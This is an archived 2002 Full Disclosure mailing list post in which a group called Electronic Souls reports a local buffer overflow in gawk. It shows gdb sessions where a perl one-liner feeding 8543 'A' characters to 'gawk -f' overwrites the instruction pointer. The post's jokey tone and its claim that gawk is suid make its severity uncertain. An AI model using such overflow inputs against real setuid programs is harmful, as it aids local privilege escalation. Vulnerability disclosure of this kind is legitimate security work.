Full Disclosure mailing list archives
[ElectronicSouls] - Gawk Overflow
From: es () hush com
Date: Thu, 28 Nov 2002 22:50:18 -0800
-----BEGIN PGP SIGNED MESSAGE----- Dear List, We have extensively researched this problem in Gawk, and now have deemed it to be a security hole. Details follow. # cat ESgawk.txt <-----]research!!![-----> Electronic Souls > Security Bug @!%^#%!^&#%@!(*#$@)($)*@(&$@(*$&@@$^&$#@ vux[ES] & gnome_ present: /bin/gawk, /usr/bin/gawk local buffer overflow !! I have information(from gnome_) that gawk program is suid on slackware linux. - --> RedHat Linux 6.2 testing: [pom@myst pom]$ gdb /bin/gawk core GNU gdb 4.17.0.11 with Linux support Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux"... (no debugging symbols found)... Core was generated by `gawk -f AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAA'. Program terminated with signal 6, Aborted. Reading symbols from /lib/libm.so.6...done. Reading symbols from /lib/libc.so.6...done. Reading symbols from /lib/ld-linux.so.2...done. #0 0x40054d21 in __kill () (gdb) i r eax: 0x0 0 ecx: 0x6 6 edx: 0x401261cc 1074946508 ebx: 0xa23 2595 esp: 0xbfffae9c -1073762660 ebp: 0xbfffaeac -1073762644 esi: 0xbfffb0f3 -1073762061 edi: 0xbfffaec4 -1073762620 eip: 0x40054d21 1074089249 eflags: 0x207 IOPL: 0; flags: CF PF IF orig_eax: 0x25 37 cs: 0x23 35 ss: 0x2b 43 ds: 0x2b 43 es: 0x2b 43 fs: 0x2b 43 gs: 0x2b 43 (gdb) (gdb) r -f `perl -e'print "A"x8543'` The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /bin/gawk -f `perl -e'print "A"x8543'` Program received signal SIGSEGV, Segmentation fault. strcpy (dest=0xbfffb123 'A' <repeats 200 times>..., src=0x41414141 <Address 0x41414141 out of bounds>) at ../sysdeps/generic/strcpy.c:37 ./sysdeps/generic/strcpy.c:37: No such file or directory. (gdb)i r eax: 0x7ebe6fe2 2126409698 ecx: 0x7ebe6fe1 2126409697 edx: 0x41414141 1094795585 ebx: 0xbfffb123 -1073762013 esp: 0xbfffb0f4 -1073762060 ebp: 0xbfffb0f8 -1073762056 esi: 0xbfffb123 -1073762013 edi: 0xbfffb114 -1073762028 eip: 0x400947a1 1074349985 eflags: 0x10a06 IOPL: 0; flags: PF IF OF RF orig_eax: 0xffffffff -1 cs: 0x23 35 ss: 0x2b 43 ds: 0x2b 43 es: 0x2b 43 fs: 0x0 0 gs: 0x0 0 - --> PhatLinux testing: (gdb) GNU gdb 4.18 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-mandrake-linux"... (no debugging symbols found)... (gdb) r -f `perl -e'print "A"x8543'` Starting program: /bin/gawk -f `perl -e'print "A"x8543'` Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () (gdb) i r eax 0xffffffff -1 ecx 0x24 36 edx 0x24 36 ebx 0xfffffffa -6 esp 0xbfffd174 0xbfffd174 ebp 0x0 0x0 esi 0x0 0 edi 0x0 0 eip 0x41414141 0x41414141 eflags 0x10282 66178 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x0 0 (gdb) h4h4 - (c) 2002 vux //fEAr! greetz to: gnome_, Brain Storm[ES] & ES-team. fuckz to : Nia*[ES], CraigTM[ES]. # Be sure to patch immediately. The Electronic Souls Crew [ElectronicSouls] (c) 2002 "People get drunk drinking alcohol." -----BEGIN PGP SIGNATURE----- Version: Hush 2.2 (Java) Note: This signature can be verified at https://www.hushtools.com/verify wlMEARECABMFAj3nDjoMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltjwwAoI24zPTruD5h T9FPXknQE8zEBkuTAJ4w47RIT3fk0+Gb11sGT726yWW70w== =SplS -----END PGP SIGNATURE----- Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Big $$$ to be made with the HushMail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliate&l=427 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- [ElectronicSouls] - Gawk Overflow es (Nov 28)